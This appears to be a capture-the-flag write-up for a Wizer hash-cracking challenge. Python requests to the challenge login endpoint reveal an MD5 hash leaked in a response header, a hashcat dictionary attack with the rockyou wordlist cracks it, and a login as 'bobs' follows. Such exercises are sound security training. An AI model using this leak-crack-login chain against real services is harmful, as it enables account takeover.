Wizer - Challenge 31 - hash cracking

Exploit

import requests

url = "https://chal31-vfdjkb4.vercel.app/api/login"

r = requests.post(url, json={
    "userName": "bobs",
    "password": "bajoraz"
})

print(r.status_code)
print(r.text)
print(r.headers)

Response:

401
Invalid user or password
{'Cache-Control': 'public, max-age=0, must-revalidate', 'Content-Length': '24', 'Date': 'Wed, 20 May 2026 16:31:46 GMT', 'Etag': '"wh5pjv6x6o"', 'Hashed': 'b7e283a09511d95d6eac86e39e7942c0', 'Server': 'Vercel', 'Strict-Transport-Security': 'max-age=63072000; includeSubDomains; preload', 'X-Matched-Path': '/api/login', 'X-Vercel-Cache': 'MISS', 'X-Vercel-Id': 'cdg1::iad1::qnpb2-1779294704939-3606141235d3'}

Running an hashcat on the retrieved hash from the database:

hashcat -a 0 -m 0 hash.txt ~/wordlists/rockyou.txt



b7e283a09511d95d6eac86e39e7942c0:password123!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: b7e283a09511d95d6eac86e39e7942c0

Now we can login as bobs and get the flag:

import requests

url = "https://chal31-vfdjkb4.vercel.app/api/login"

r = requests.post(url, json={
    "userName": "bobs",
    "password": "password123!"
})

print(r.text)